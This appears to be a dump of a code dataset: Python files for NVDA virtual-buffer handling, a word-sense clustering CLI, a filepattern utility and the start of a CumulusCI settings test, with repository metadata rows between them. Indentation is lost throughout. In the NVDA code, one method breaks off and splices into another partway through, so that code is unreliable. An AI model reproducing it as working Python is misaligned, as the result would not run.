self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=str(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
@abstractmethod
def getNVDAObjectFromIdentifier(self, docHandle, ID):
raise NotImplementedError
@abstractmethod
def getIdentifierFromNVDAObject(self,obj):
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
ui.message(_("Use screen layout on"))
else:
ui.message(_("Use screen layout off"))
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
raise LookupError
else:
# We're moving forward by column.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self, textRange):
return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self, textRange):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in textRange.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
if not self.VBufHandle:
ontrolFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
def _isNVDAObjectInApplication_noWalk(self, obj):
inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
if inApp is not None:
return inApp
try:
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
except:
log.debugWarning("getIdentifierFromNVDAObject failed. "
"Object probably died while walking ancestors.", exc_info=True)
return None
node = VBufRemote_nodeHandle_t()
if not self.VBufHandle:
return None
try:
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
except WindowsError:
return None
if node:
return False
return None
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
| true
| true
|
f718f706894e02a8cb3427d1bb25139c6ae58378
| 7,286
|
py
|
Python
|
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | null | null | null |
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | 2
|
2019-04-27T14:40:10.000Z
|
2019-08-21T15:43:19.000Z
|
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | null | null | null |
from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
"""
Generate unclustered words in OUT_DIR from word list WORDS
"""
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
# Get Wiktionary results
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
# Get WordNet results
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
"""
Add table of frequencies to DB
"""
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
"""
Compile manually clustered words in files INFS to OUT as a gold csv ready
for use by eval
"""
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
"""
Filter a gold CSV to filter non-WordNet rows
"""
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
"""
Pick etymologically ambigious nouns for creating manual clustering.
"""
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| 35.198068
| 131
| 0.549684
|
from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| true
| true
|
f718f70961bab8dab9071693156e930da601e4b4
| 10,851
|
py
|
Python
|
utils/polus-filepattern-util/filepattern/classes.py
|
Vishakha6/polus-plugins
|
ff6a31d5a6b78a26378745719f19d3e724e25670
|
[
"MIT"
] | 1
|
2021-07-23T20:46:18.000Z
|
2021-07-23T20:46:18.000Z
|
utils/polus-filepattern-util/filepattern/classes.py
|
Vishakha6/polus-plugins
|
ff6a31d5a6b78a26378745719f19d3e724e25670
|
[
"MIT"
] | 2
|
2021-07-13T16:20:31.000Z
|
2021-08-20T11:21:34.000Z
|
utils/polus-filepattern-util/filepattern/classes.py
|
gauharbains/polus-plugins
|
5e4d1e33bb61d7619d3a76fb7c115d475628a909
|
[
"MIT"
] | 3
|
2021-08-04T15:45:53.000Z
|
2022-03-09T19:03:57.000Z
|
import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
""" Abstract base class for handling filepatterns
Most of the functions in filepattern return complicated variable
structures that might be difficult to use in an abstract way. This class
provides tools to streamline usage of the filepattern functions. In
particular, the iterate function is an iterable that permits simple
iteration over filenames with specific values and grouped by any variable.
"""
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
"""Initialize a Pattern object
Args:
file_path: Path to directory or file to parse
pattern: A filepattern string
var_order: Defines the dictionary nesting order. The list of
characters is limited to :any:`VARIABLES`. *Defaults to
"rtczyxp".*
"""
self.files = {}
self.uniques = {}
# Define iteration variables
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
"""Iterate through files parsed using a filepattern
This function is an iterable. On each call, it returns a list of
filenames that matches a set of variable values. It iterates through
every combination of variable values.
Variables designated in the group_by input argument are grouped
together. So, if ``group_by="zc"``, then each iteration will return all
filenames that have constant values for each variable except z and c.
In addition to the group_by variable, specific variable arguments can
also be included as with the :any:`get_matching` function.
Args:
group_by: String of variables by which the output filenames will be
grouped
**kwargs: Each keyword argument must be a valid uppercase letter
from :any:`VARIABLES`. The value can be one integer or a list of
integers.
Returns:
Iterable that returns a list of files with matching variables
"""
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
"""Parse data in a directory
This is where all the logic for the parsing the data should live. It
must return a nested dictionary in the same format as
:any:`parse_directory`.
Args:
file_path: Path to target file directory to parse
Returns:
A nested dictionary of file dictionaries
"""
def output_name(self,files:typing.List[dict] = []) -> str:
"""Determine an output name for a list of files
See the :any:`output_name` method for more details.
This method uses the ``filepattern`` used to initialize the object to
determine an output file name that summarizes the range of variables
included in the ``file_path`` list of dictionaries. If ``file_path`` is
empty, this method returns an output file name that summarizes the range
of all variables parsed by the object.
Args:
files: A list of file dictionaries
Returns:
An output file name
"""
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
# Get filenames matching values for specified variables
def get_matching(self,**kwargs):
""" Get all filenames matching specific values
This function runs the get_matching function using the objects file
dictionary. For more information, see :any:`get_matching`.
Args:
**kwargs: One of :any:`VARIABLES`, must be uppercase, can be single
values or a list of values
Returns:
A list of all files matching the input values
"""
# get matching files
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
# If self.files is a list, no parsing took place so just loop through the files
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
# Generate the values to iterate through
iter_vars = {}
for v in self.var_order:
# Proceed to the next variable if v is not a grouping variable
if v in group_by:
continue
# Check to see if the current variable has a matching value
elif v.upper() in kwargs.keys():
# If the value is a list, then we copy the list since we modify
# it later
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
# If the value is not a list, turn it into a list for consistent
# access when looping over values
else:
iter_vars[v] = [kwargs[v.upper()]]
# If the variable is neither in group_by or kwargs, just copy the
# dictionary or list since it gets modified later
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
# Find the shallowest variable in the dictionary structure
# Shallowest means the variable containing the list of file dictionaries
shallowest = None
for v in iter_vars.keys():
# -1 indicates the variable doesn't exist in the file names
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
""" Main class for handling filename patterns
Most of the functions in filepattern.py return complicated variable
structures that might be difficult to use in an abstract way. This class
provides tools to use the above functions in a simpler way. In particular,
the iterate function is an iterable that permits simple iteration over
filenames with specific values and grouped by any desired variable.
"""
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
"""Parse data in a directory
In the future, this function will parse data from a directory, and add
it to the existing dictionary if it exists. For more information on how
this method works, see :any:`parse_directory`.
Args:
file_path: Path to target file directory to parse
Returns:
A nested dictionary of file dictionaries
"""
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
""" Main class for handling stitching vectors
This class works nearly identically to :any:`FilePattern`, except it works
with lines inside of a stitching vector. As with FilePattern, the iterate
method will iterate through values, which in the case of VectorPattern are
parsed lines of a stitching vector.
Note:
One major difference between this class and :any:`FilePattern` is that
the ``file`` values in the file dictionaries contain strings rather than
``pathlib.Path`` objects.
"""
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
"""Parse data in a directory
In the future, this function will parse data from a directory, and add
it to the existing dictionary if it exists. For more information on how
this method works, see :any:`parse_vector`.
Args:
file_path: Path to target stitching vector to parse
Returns:
A nested dictionary of file dictionaries
"""
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
| 38.478723
| 126
| 0.589531
|
import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
self.files = {}
self.uniques = {}
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
def output_name(self,files:typing.List[dict] = []) -> str:
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
def get_matching(self,**kwargs):
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
iter_vars = {}
for v in self.var_order:
if v in group_by:
continue
elif v.upper() in kwargs.keys():
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
else:
iter_vars[v] = [kwargs[v.upper()]]
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
shallowest = None
for v in iter_vars.keys():
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
| true
| true
|
f718f7738c7e7e56290c2c143c5634263a7cef6f
| 2,697
|
py
|
Python
|
cumulusci/tasks/preflight/tests/test_settings.py
|
atrancandoris/CumulusCI
|
cc468ea315af2dd8c11b67f9316af65530d0f4bc
|
[
"BSD-3-Clause"
] | 1
|
2020-12-04T10:29:31.000Z
|
2020-12-04T10:29:31.000Z
|
cumulusci/tasks/preflight/tests/test_settings.py
|
ThierryFeltin/CumulusCI
|
80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/tasks/preflight/tests/test_settings.py
|
ThierryFeltin/CumulusCI
|
80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14
|
[
"BSD-3-Clause"
] | null | null | null |
from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
